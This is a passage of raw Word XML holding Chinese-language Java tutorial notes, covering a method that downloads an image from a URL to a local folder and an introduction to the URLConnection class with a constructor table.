          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if(!file.exists()) {//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径不存在就创建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE9E9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>file.mkdirs();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D76B17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D342677" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println(getFileName(url));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B47AF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>File save=new File(file.getPath()+"//"+getFileName(url));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE70D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println(save.getPath());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B7512" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>FileOutputStream fos = new FileOutputStream(save);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6F746" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    fos.write(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A91A0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    if(fos!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59A55D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          fos.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329BA8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E67DEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    if(in!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79CA9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          in.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E9086" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB4AF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D77085" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// TODO Auto-generated catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B047E26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.err.println(e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26685DDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE583B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9A458" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322A0A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A1AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168FF40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>public static void main(String[] args)throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0414F05A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// TODO Auto-generated method stub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325565B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//System.out.println(getFileName("http://www.baidu.com"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C0017" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>String url="https://ss1.baidu.com/9vo3dSag_xI4khGko9WTAnF6hhy/image/h%3D300/sign=10da86d6df43ad4bb92e40c0b2035a89/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C2754" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ "03087bf40ad162d93b3a196f1fdfa9ec8b13cde9.jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4DAB77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>downLoadFormURL(url,"E:\\");//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7C7ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//getFromURL2("http://www.baidu.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DA4D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//getContent("http://d1.sina.com.cn/200903/11/168512_whh_950_450.jpg");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F28B7FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//getURLDetails("http://www.runoob.com/index.html?language=cn#j2se");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826A154" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D07CD22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F558557" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE93B56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抽象类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是表示应用程序和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的通信链接的所有类的超类。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该类的实例可以用于从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用的资源中读取和写入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04963F31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1302F27A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>openConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法创建连接对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CE438" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·设置参数和一般请求属性被操纵。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C377F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法实现与远程对象的实际连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099E66A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·远程对象变得可用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以访问头字段和远程对象的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B296432" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8544" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4"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4680"/>
        <w:gridCol w:w="3864"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="45444D4B" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF3F5"/>
            <w:tcMar>
              <w:top w:w="96" w:type="dxa"/>
              <w:left w:w="96" w:type="dxa"/>
              <w:bottom w:w="96" w:type="dxa"/>
              <w:right w:w="96" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DF5BD63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="264" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4F4F4F"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4F4F4F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>构造方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF3F5"/>
            <w:tcMar>
              <w:top w:w="96" w:type="dxa"/>
              <w:left w:w="96" w:type="dxa"/>
              <w:bottom w:w="96" w:type="dxa"/>
              <w:right w:w="96" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="376F5608" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="264" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4F4F4F"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4F4F4F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0A77903A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68560EA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="264" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体"/>
                <w:color w:val="4F4F4F"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体" w:hint="eastAsia"/>
                <w:color w:val="4F4F4F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>protected URLConnection(URL url)</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="487D501F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="264" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体"/>
                <w:color w:val="4F4F4F"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:cs="楷体" w:hint="eastAsia"/>
                <w:color w:val="4F4F4F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>构造与指定URL的URL连接。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E4C82E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
